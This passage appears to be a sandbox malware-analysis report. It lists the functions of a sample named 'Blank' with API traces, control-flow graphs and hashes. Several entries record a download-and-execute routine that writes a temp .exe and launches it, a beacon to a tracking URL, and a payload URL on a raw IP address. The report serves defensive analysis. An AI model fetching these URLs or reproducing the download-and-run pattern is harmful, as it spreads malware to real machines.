                                                                                                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                    • String ID: i
                                                                                                                                    • API String ID: 1583243082-3865851505
                                                                                                                                    • Opcode ID: 0494fdc42e8769379b0870c23ea2fcec23764e3fb2b03327556ec5d938218516
                                                                                                                                    • Instruction ID: 28da14a84061f0baa7639df65aabf4291158cdcae1065e881c1b5d500b1d334c
                                                                                                                                    • Opcode Fuzzy Hash: 0494fdc42e8769379b0870c23ea2fcec23764e3fb2b03327556ec5d938218516
                                                                                                                                    • Instruction Fuzzy Hash: EF51E571C047449BE701ABA0EC06BAE7774FF1A309F44513AE801762B3DB749A89C76E
                                                                                                                                    Function 00402ADD Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402B00
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,0045F908,00000000,00000000,00000000,00000000), ref: 00402B16
                                                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402B32
                                                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402B48
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402B81
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402BBD
                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402BDA
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402BF0
                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00402C51
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402C66
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402C72
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402C7B
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402C7E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                    • String ID: .exe$<$ShareScreen
                                                                                                                                    • API String ID: 3323492106-493228180
                                                                                                                                    • Opcode ID: d312d9b44827e30fe439d61f7f043e5141abf4658646822535e45e5d67e5457f
                                                                                                                                    • Instruction ID: 9ace17b0eeb0819c6dec8f6a4d329066a11759dc84a4fb9a492070316dd2606d
                                                                                                                                    • Opcode Fuzzy Hash: d312d9b44827e30fe439d61f7f043e5141abf4658646822535e45e5d67e5457f
                                                                                                                                    • Instruction Fuzzy Hash: 5A4194B590061CAFEB209B60DD89FEA77BCFF05344F0080B6B545E2191DEB49E858FA4
                                                                                                                                    Function 0043E5E8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 74 43e5e8-43e618 call 43e34b 77 43e633-43e63f call 43ac5e 74->77 78 43e61a-43e625 call 42fcc2 74->78 83 43e641-43e656 call 42fcc2 call 42fcd5 77->83 84 43e658-43e6a1 call 43e2b6 77->84 85 43e627-43e62e call 42fcd5 78->85 83->85 94 43e6a3-43e6ac 84->94 95 43e70e-43e717 GetFileType 84->95 92 43e90a-43e910 85->92 99 43e6e3-43e709 GetLastError call 42fc9f 94->99 100 43e6ae-43e6b2 94->100 96 43e760-43e763 95->96 97 43e719-43e74a GetLastError call 42fc9f CloseHandle 95->97 103 43e765-43e76a 96->103 104 43e76c-43e772 96->104 97->85 111 43e750-43e75b call 42fcd5 97->111 99->85 100->99 105 43e6b4-43e6e1 call 43e2b6 100->105 108 43e776-43e7c4 call 43aba7 103->108 104->108 109 43e774 104->109 105->95 105->99 116 43e7c6-43e7d2 call 43e4c7 108->116 117 43e7d4-43e7f8 call 43e069 108->117 109->108 111->85 116->117 123 43e7fc-43e806 call 434ab1 116->123 124 43e80b-43e84e 117->124 125 43e7fa 117->125 123->92 127 43e850-43e854 124->127 128 43e86f-43e87d 124->128 125->123 127->128 130 43e856-43e86a 127->130 131 43e883-43e887 128->131 132 43e908 128->132 130->128 131->132 133 43e889-43e8bc CloseHandle call 43e2b6 131->133 132->92 136 43e8f0-43e904 133->136 137 43e8be-43e8ea GetLastError call 42fc9f call 43ad70 133->137 136->132 137->136
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0043E2B6: CreateFileW.KERNEL32(00000000,00000000,?,0043E691,?,?,00000000,?,0043E691,00000000,0000000C), ref: 0043E2D3
                                                                                                                                    • GetLastError.KERNEL32 ref: 0043E6FC
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043E703
                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043E70F
                                                                                                                                    • GetLastError.KERNEL32 ref: 0043E719
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043E722
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043E742
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043E88C
                                                                                                                                    • GetLastError.KERNEL32 ref: 0043E8BE
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043E8C5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                    • String ID: H
                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                    • Opcode ID: ed142d1c50a3092f3ed7b4dbdb7af06b480ced3646980910cbb450a7a2ebc94f
                                                                                                                                    • Instruction ID: 4841922e18cde6d00a0830d448adfd18720c34061680838fc0e904a1bc2767c6
                                                                                                                                    • Opcode Fuzzy Hash: ed142d1c50a3092f3ed7b4dbdb7af06b480ced3646980910cbb450a7a2ebc94f
                                                                                                                                    • Instruction Fuzzy Hash: 1DA12932A101188FDF19EF69DC517AE7BB0AB0A324F14116EE811DB3D1DB399C16CB5A
                                                                                                                                    Function 0043440D Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 142 43440d-43441d 143 434437-434439 142->143 144 43441f-434432 call 42fcc2 call 42fcd5 142->144 145 4347a1-4347ae call 42fcc2 call 42fcd5 143->145 146 43443f-434445 143->146 158 4347b9 144->158 163 4347b4 call 42b6dd 145->163 146->145 149 43444b-434476 146->149 149->145 153 43447c-434485 149->153 156 434487-43449a call 42fcc2 call 42fcd5 153->156 157 43449f-4344a1 153->157 156->163 161 4344a7-4344ab 157->161 162 43479d-43479f 157->162 164 4347bc-4347c1 158->164 161->162 166 4344b1-4344b5 161->166 162->164 163->158 166->156 169 4344b7-4344ce 166->169 171 4344d0-4344d3 169->171 172 4344eb-4344f4 169->172 173 4344d5-4344db 171->173 174 4344dd-4344e6 171->174 175 434512-43451c 172->175 176 4344f6-43450d call 42fcc2 call 42fcd5 call 42b6dd 172->176 173->174 173->176 177 434587-4345a1 174->177 179 434523-434541 call 434b8b call 43494e * 2 175->179 180 43451e-434520 175->180 207 4346d4 176->207 182 4345a7-4345b7 177->182 183 434675-43467e call 43e931 177->183 211 434543-434559 call 42fcd5 call 42fcc2 179->211 212 43455e-434584 call 435cd2 179->212 180->179 182->183 187 4345bd-4345bf 182->187 195 4346f1 183->195 196 434680-434692 183->196 187->183 191 4345c5-4345eb 187->191 191->183 197 4345f1-434604 191->197 200 4346f5-43470d ReadFile 195->200 196->195 202 434694-4346a3 GetConsoleMode 196->202 197->183 198 434606-434608 197->198 198->183 203 43460a-434635 198->203 205 434769-434774 GetLastError 200->205 206 43470f-434715 200->206 202->195 208 4346a5-4346a9 202->208 203->183 210 434637-43464a 203->210 213 434776-434788 call 42fcd5 call 42fcc2 205->213 214 43478d-434790 205->214 206->205 215 434717 206->215 209 4346d7-4346e1 call 43494e 207->209 208->200 216 4346ab-4346c5 ReadConsoleW 208->216 209->164 210->183 218 43464c-43464e 210->218 211->207 212->177 213->207 225 434796-434798 214->225 226 4346cd-4346d3 call 42fc9f 214->226 222 43471a-43472c 215->222 223 4346c7 GetLastError 216->223 224 4346e6-4346ef 216->224 218->183 228 434650-434670 218->228 222->209 232 43472e-434732 222->232 223->226 224->222 225->209 226->207 228->183 236 434734-434744 call 434129 232->236 237 43474b-434756 232->237 249 434747-434749 236->249 239 434762-434767 call 433f69 237->239 240 434758 call 434279 237->240 247 43475d-434760 239->247 240->247 247->249 249->209
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 44295d0f6b7e4f104c510fc49341a82eabd9566e5e47fcc4ac18fdb69dd937fd
                                                                                                                                    • Instruction ID: 9b82a02f6ba98fc4ecb85c80f83a2f94e53c71f83c009c0e10085070dca0e904
                                                                                                                                    • Opcode Fuzzy Hash: 44295d0f6b7e4f104c510fc49341a82eabd9566e5e47fcc4ac18fdb69dd937fd
                                                                                                                                    • Instruction Fuzzy Hash: B0C1D575A04249AFDB11DFA9D841BEEBBB0BF4E314F1450AAE41097392C73CA941CB69
                                                                                                                                    Function 00406220 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                    • String ID: Ph@
                                                                                                                                    • API String ID: 1687354797-1208309661
                                                                                                                                    • Opcode ID: d4e0f9675558e60237a8a2ff48e57ec2353798a97a7fc3ffc1a21e3c1faeaed2
                                                                                                                                    • Instruction ID: 959de712201b3e80750cae0bb8057f124b32a0e8a61bf2471d76b085137173ba
                                                                                                                                    • Opcode Fuzzy Hash: d4e0f9675558e60237a8a2ff48e57ec2353798a97a7fc3ffc1a21e3c1faeaed2
                                                                                                                                    • Instruction Fuzzy Hash: E7217171D042099ADB01ABFAD845BDEBBF8AF18328F14447FF100B72C1DB7D99548669
                                                                                                                                    Function 00403262 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 70networkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 290 403262-40328f InternetOpenW 291 403291-4032f3 call 427970 call 42f109 * 3 InternetOpenUrlW 290->291 292 403306 290->292 291->292 304 4032f5-403304 InternetCloseHandle * 2 291->304 294 403308-403316 call 410a06 292->294 304->294
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00403285
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004032EB
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004032FC
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004032FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleOpen
                                                                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                    • API String ID: 435140893-1501832161
                                                                                                                                    • Opcode ID: 9ad2b166d886677a15383e8c175082d2b74f9b2617f4b57920964c4ba8b3da5b
                                                                                                                                    • Instruction ID: 5c55476efa41154c02c58c75c8bbf2677bc4a68046b01d2f2ff21c9ad08589bc
                                                                                                                                    • Opcode Fuzzy Hash: 9ad2b166d886677a15383e8c175082d2b74f9b2617f4b57920964c4ba8b3da5b
                                                                                                                                    • Instruction Fuzzy Hash: 7B1194E5A0031C7EEB10AB719C89D7B776CDB44649F9005BBBD11D2142EA789E488A64
                                                                                                                                    Function 00406850 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040686C
                                                                                                                                    • __Cnd_signal.LIBCPMT ref: 00406878
                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040688D
                                                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00406894
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2059591211-0
                                                                                                                                    • Opcode ID: b7a47c89c96c251d70570d3e1b9f795de555e7e4dcb1d9f5a757aff30a7bf6b9
                                                                                                                                    • Instruction ID: dbdb6db8e18017817b5b5e382c457ddabb51665c1ceee3f7154f10775ad951ac
                                                                                                                                    • Opcode Fuzzy Hash: b7a47c89c96c251d70570d3e1b9f795de555e7e4dcb1d9f5a757aff30a7bf6b9
                                                                                                                                    • Instruction Fuzzy Hash: D6F082314007019FE72577A3C817B4A73A0AF1031DF10893FF0552A5E2DFBEA9948A5D
                                                                                                                                    Function 0042F1CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(0045A0F0,00000010,00000003,0043316D), ref: 0042F1DF
                                                                                                                                    • ExitThread.KERNEL32 ref: 0042F1E6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                    • String ID: /)@
                                                                                                                                    • API String ID: 1611280651-4274652852
                                                                                                                                    • Opcode ID: 83e9c40092cfb642719109055f6c845f3130cd2563baa4f233c7b8878f2a35ae
                                                                                                                                    • Instruction ID: ee0923e71a31f67c0c18e9d058b3d13315475dd9ffcbbe688a7aaed53372b549
                                                                                                                                    • Opcode Fuzzy Hash: 83e9c40092cfb642719109055f6c845f3130cd2563baa4f233c7b8878f2a35ae
                                                                                                                                    • Instruction Fuzzy Hash: 38F0FF74A00610AFDF00AFB1D80AB6E3770FF4A704F50816EF80567292CB7A6914CBA8
                                                                                                                                    Function 0042F320 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 347 42f320-42f32b 348 42f341-42f354 call 42f2d7 347->348 349 42f32d-42f33f call 42fcd5 call 42b6dd 347->349 355 42f382 348->355 356 42f356-42f373 CreateThread 348->356 364 42f391-42f394 349->364 357 42f384-42f390 call 42f249 355->357 359 42f395-42f39a 356->359 360 42f375-42f381 GetLastError call 42fc9f 356->360 357->364 362 42f3a1-42f3a3 359->362 363 42f39c-42f39f 359->363 360->355 362->357 363->362
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNEL32(?,?,Function_0002F1CC,00000000,?,?), ref: 0042F369
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040DF7F,00000000,00000000,?,?,00000000,?), ref: 0042F375
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0042F37C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                    • Opcode ID: aa89b02cdd8db3e83b1f77485f9c4b4ff216c2f0bad5c0189132b496b532282a
                                                                                                                                    • Instruction ID: 9e272f628855c1abdafbdf00b6f3c6a1f4ed2e1aeac3c636d3402eaa5ee58449
                                                                                                                                    • Opcode Fuzzy Hash: aa89b02cdd8db3e83b1f77485f9c4b4ff216c2f0bad5c0189132b496b532282a
                                                                                                                                    • Instruction Fuzzy Hash: ED018436600129ABDB15AFA2EC059AF3B79EF85324BD1007AFC0596650DB398819C6A8
                                                                                                                                    Function 00435C39 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 368 435c39-435c51 call 43ae01 371 435c53-435c58 call 42fcd5 368->371 372 435c64-435c7a SetFilePointerEx 368->372 379 435c5e-435c62 371->379 374 435c8b-435c95 372->374 375 435c7c-435c89 GetLastError call 42fc9f 372->375 378 435c97-435cac 374->378 374->379 375->379 380 435cb1-435cb6 378->380 379->380
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,004547B8,?,?,?,?,00435CE8,?,?,00000002,00000000), ref: 00435C72
                                                                                                                                    • GetLastError.KERNEL32(?,00435CE8,?,?,00000002,00000000,?,0043549A,?,00000000,00000000,00000002,?,?,?,?), ref: 00435C7C
                                                                                                                                    • __dosmaperr.LIBCMT ref: 00435C83
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                    • Opcode ID: 7dc8eab7f9ed2ad662475f01777332044bc1dcd8902c68e2dc975a78cb4ac02d
                                                                                                                                    • Instruction ID: dd4cd071328c77009efb65954f7eb2f29137def235a731c593b674277a59e015
                                                                                                                                    • Opcode Fuzzy Hash: 7dc8eab7f9ed2ad662475f01777332044bc1dcd8902c68e2dc975a78cb4ac02d
                                                                                                                                    • Instruction Fuzzy Hash: 24019037710A18AFCF149FAADC0586E3B29EB89334F24125AF8158B280EA35DC1187D8
                                                                                                                                    Function 0040320B Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 382 40320b-403237 RegCreateKeyExW 383 403239-40324b RegSetValueExW 382->383 384 40324d-403250 382->384 383->384 385 403252-403255 RegCloseKey 384->385 386 40325b-403261 384->386 385->386
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040322D
                                                                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403245
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403255
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1818849710-0
                                                                                                                                    • Opcode ID: 033bf27eec60ef005e80fe8db5c99212ec5d0bdfd077fbf8c744d02c98278bb9
                                                                                                                                    • Instruction ID: 1c4c9f797f1716bdb0437adb5be896f389de749c6eed8fcc7f652fdd6d752820
                                                                                                                                    • Opcode Fuzzy Hash: 033bf27eec60ef005e80fe8db5c99212ec5d0bdfd077fbf8c744d02c98278bb9
                                                                                                                                    • Instruction Fuzzy Hash: 9BF0B4B650011CFFEB214F94DC85DAB7A6CEB40BE9F100079FA01B2151D2714E0096A4
                                                                                                                                    Function 0042F280 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 387 42f280-42f28d call 43316e 390 42f298-42f2a0 387->390 391 42f28f-42f292 ExitThread 387->391 390->391 392 42f2a2-42f2a6 390->392 393 42f2a8 call 4369da 392->393 394 42f2ad-42f2b3 392->394 393->394 396 42f2c0-42f2c6 394->396 397 42f2b5-42f2b7 394->397 396->391 399 42f2c8-42f2ca 396->399 397->396 398 42f2b9-42f2ba CloseHandle 397->398 398->396 399->391 400 42f2cc-42f2d6 FreeLibraryAndExitThread 399->400
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0043316E: GetLastError.KERNEL32(?,?,?,0042FCDA,00436260,?,00433118,00000001,00000364,?,0042F1F1,0045A0F0,00000010), ref: 00433173
                                                                                                                                      • Part of subcall function 0043316E: _free.LIBCMT ref: 004331A8
                                                                                                                                      • Part of subcall function 0043316E: SetLastError.KERNEL32(00000000), ref: 004331DC
                                                                                                                                    • ExitThread.KERNEL32 ref: 0042F292
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0042F3B2,?,?,0042F229,00000000), ref: 0042F2BA
                                                                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042F3B2,?,?,0042F229,00000000), ref: 0042F2D0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1198197534-0
                                                                                                                                    • Opcode ID: 1ef2ec2baed6159537b438a4592519a7ded75044c0a88a9a38b87843360b0a91
                                                                                                                                    • Instruction ID: 8e765a27f46b7f181723813e8b8f7697fcc70bdf62941884683bdf3fabb26abb
                                                                                                                                    • Opcode Fuzzy Hash: 1ef2ec2baed6159537b438a4592519a7ded75044c0a88a9a38b87843360b0a91
                                                                                                                                    • Instruction Fuzzy Hash: 26F0B438200620ABCB209B75D808A5B3778AF07724FD847B6F824C22A1EB39DC458678
                                                                                                                                    Function 004023A3 Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 401 4023a3-4023b1 402 4023b7-4023bc 401->402 403 40256a-40256c PostQuitMessage 401->403 405 4023d5-4023dc 402->405 406 4023be-4023d0 DefWindowProcW 402->406 404 402572-402577 403->404 407 4023e3-4023ea 405->407 408 4023de call 401da9 405->408 406->404 407->404 409 4023f0-402568 call 4010ba call 402add 407->409 408->407 409->404
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023CA
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0040256C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3873111417-0
                                                                                                                                    • Opcode ID: 2aad61e126746ab9d305f53d1e5a775153bddafdd2397f4778e5ad2de1e9c0b7
                                                                                                                                    • Instruction ID: cf098905b6681d93cb098224308f76bf0b92e5e53e214166987cf9294a791690
                                                                                                                                    • Opcode Fuzzy Hash: 2aad61e126746ab9d305f53d1e5a775153bddafdd2397f4778e5ad2de1e9c0b7
                                                                                                                                    • Instruction Fuzzy Hash: C1414195266B80B9E610DFA0FC15B262724FF64762F10603BE508CB2F2E3B59549C74F
                                                                                                                                    Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 415 40155a-4016d4 Sleep call 4010ba 417 4016d9-4016dd 415->417
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(0000215D), ref: 00401562
                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$Sleep
                                                                                                                                    • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                                                                                                    • API String ID: 3358372957-2681926500
                                                                                                                                    • Opcode ID: 3ffa37777b20c65907d2d1e5baad20e495479ff5dd41dfb7644a142e4e80d442
                                                                                                                                    • Instruction ID: c851d256f46f7ecba2257b5bcd659fbf15afac3c8a49fe883214803c5ead852f
                                                                                                                                    • Opcode Fuzzy Hash: 3ffa37777b20c65907d2d1e5baad20e495479ff5dd41dfb7644a142e4e80d442
                                                                                                                                    • Instruction Fuzzy Hash: FF31BC06265780A5E610CBA1BC55B262774EF6C7A2F10643BD604CB2F2E3A1958DC75F
                                                                                                                                    Function 00402A49 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 418 402a49-402ab4 call 427970 call 42b48b call 42c660 call 40290c 427 402ac2-402adc call 4050bd call 410a06 418->427 428 402ab6-402ab9 418->428 428->427 430 402abb-402abf 428->430 430->427 432 402ac1 430->432 432->427
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00402A78
                                                                                                                                    • __fassign.LIBCMT ref: 00402A88
                                                                                                                                      • Part of subcall function 0040290C: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004029EF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2843524283-0
                                                                                                                                    • Opcode ID: 8e2aa1164b480ee57adb8bca26fd0d8aeed69d82757a4e1f427a91ec176694ab
